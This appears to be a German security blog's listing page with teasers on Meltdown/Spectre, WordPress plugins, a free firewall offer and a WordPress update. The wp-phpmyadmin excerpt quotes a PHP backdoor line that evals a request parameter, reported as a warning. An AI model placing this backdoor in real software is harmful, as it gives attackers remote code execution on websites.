Sicherheit

Security Info: Meltdown & Spectre – gravierende Sicherheitslücke in Prozessoren

Du hast vermutlich in der Presse schon etwas von der Sicherheitslücke in Prozessoren (CPU) von Intel, AMD und ARM gehört. Solltest du einen PC mit einem der betroffenen Prozessoren besitzen – was der Fall sein wird – dann bist du von dieser Lücke betroffen. Angreifer können in diesem Fall, über einen Schadcode, an sensible Informationen deines PCs kommen. Entdeckung Entdeckt wurde diese Lücke vom Google Project Zero bereits Mitte 2017. Die betroffenen Hersteller wurden am 1.6.2017 über die Lückeinformiert. Project…

Wordpress

WordPress Plugin BruteProtect jetzt kostenlos

  BruteProtect wurde von Automattic (Die Macher von WordPress) übernommen. Daher ist das Plugin ab sofort mit allen Funktionen kostenlos nutzbar! Mit Bruteprotect schließt ihr euch einem Netzwerk zum Schutz eurer WordPress basierten Webseite an, der Zweck liegt im blockieren von Brute Force Angriffen. Nebenbei erhaltet ihr noch eine Remote Möglichkeit eure Installation auf dem neuesten Stand zu halten und ihr könnt die Up- / Downtimes eurer Webseite tracken. Wenn ihr mehr über das Plugin, die Installation und die Einrichtung wissen…

Software

Outpost Security Suite Pro 7.5 gratis

Noch keine Firewall? Dann wird es aber Zeit – und damit ihr euer Geld in Eis investieren könnt (oder Heizkissen….) habe ich hier einen Link zu einer kostenfreien Outpost Security Suite Pro Version für 1 Jahr, präsentiert von dottech. Es handelt sich um Version 7.5 – das ist in diesem Fall die derzeit aktuelle Version, also nix Altes! Ich selbst nutze Kaspersky – habe aber über Outpost schon eine Menge Gutes gehört, am Besten testen! Wer sich für die gratis…

Wordpress

wp-phpmyadmin Plug-In – Jetzt löschen!

Nutzt du das WordPress Plug-In WP-phpmyadmin? Dann solltest du es jetzt laut den Sucuri Experten sofort löschen. Die Security Experten haben verschiedenen Seiten gesehen welche durch die Nutzung von wp-phpmyadmin gehackt wurden. Der Angriff hat durch eine Backdoor statt gefunden, der folgende Code befand sich in der upgrade.php Datei: <?php if(isset($_REQUEST["asc"]))eval(stripslashes($_REQUEST["asc"])); ?> Dieser Teil ist laut Sucuri nicht Bestandteil des Plug-Ins und erlaubt den Remote Zugriff auf die WordPress Installation. Das Plug-In soll Zugriff auf phpMyAdmin direkt aus WordPress heraus…

Wordpress

WordPress Update 3.1.3 ist draussen

Es gibt ein Update für deine WordPress Installation, in Version 3.1.3 werden etliche Sicherheitslöcher gestopft: Various security hardening by Alexander Concha. Taxonomy query hardening by John Lamansky. Prevent sniffing out user names of non-authors by using canonical redirects. Props Verónica Valeros. Media security fixes by Richard Lundeen of Microsoft, Jesse Ou of Microsoft, and Microsoft Vulnerability Research. Improves file upload security on hosts with dangerous security settings. Cleans up old WordPress import files if the import does not finish. Introduce…